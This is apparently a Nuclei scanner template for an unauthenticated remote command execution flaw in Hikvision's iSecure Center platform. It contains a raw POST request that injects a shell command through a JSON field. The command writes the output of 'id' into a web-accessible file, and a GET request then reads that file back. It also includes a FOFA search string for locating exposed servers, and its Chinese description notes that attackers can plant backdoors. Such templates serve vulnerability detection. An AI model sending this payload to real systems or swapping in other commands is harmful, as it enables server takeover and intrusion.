http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - uid=
            - gid=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /center/api/installation/detection HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/json;charset=UTF-8

          {"type":"environment","operate":"","machines":{"id":  "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/{{username}}.txt)"}}
        - |
          GET /vms/static/{{username}}.txt HTTP/1.1
          Host: {{Hostname}}
id: hikvision-detection-rce
info:
    author: Superhero
    description: |-
        fofa: app="HIKVISION-iSecure-Center"
        海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 海康威视综合安防管理平台 detection 前台RCE
    reference:
        - https://blog.csdn.net/m0_60571842/article/details/140688459
    severity: high
    tags:
        - HIKVISION-iSecure-Center
        - tomcat
variables:
    username: '{{to_lower(rand_base(6))}}'
